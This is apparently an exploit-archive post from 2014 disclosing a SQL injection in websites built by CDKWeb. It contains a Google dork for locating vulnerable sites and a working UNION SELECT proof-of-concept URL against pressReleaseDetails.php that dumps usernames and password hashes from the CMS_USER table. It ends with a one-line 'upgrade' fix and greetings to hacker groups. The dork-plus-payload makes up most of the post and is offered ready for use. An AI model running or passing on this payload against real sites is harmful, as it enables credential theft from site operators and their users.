==== Exploit Author:Th3 R0cksT3r ====


# Exploit Title: CDKWeb SQL injection
# Date: 06.02.2014
# Email: th3rockst3r@gmail.com
# Vendor Homepage: http://www.cdkweb.com/
# Facebook: Facebook.com/thee.rocksTer
# Google Dork: inurl:.php?id= intext:Website Design and Web Development by
CDKWeb

# Risk: High


=== Description*  ===*
An attacker can get database info by this vulnerablity.



Proof Of Concept:

http://www.site.com/pressReleaseDetails.php?id=-136/%27+UNION+SELECT+1,2,3,4,group_concat%28id,0x3a,username,0x3a,password%29,6,7,8+from+CMS_USER--+




===Solution===
Upgrade to latest version.





# Greetz:Back Bone,Demon,Orions Hunter,Dark Knight Sparda,Gh0st
KilL3r,Luge,Code Breaker,Darklord,Devil Prince,Rakhal Beduin,Bakeer
Bhai,R007 C0D3,Dipto,8l@ck 3xplor3r,
Sparrow,Bd Matrix,Cyber Blader,Batchfweak and BD BLACK HAT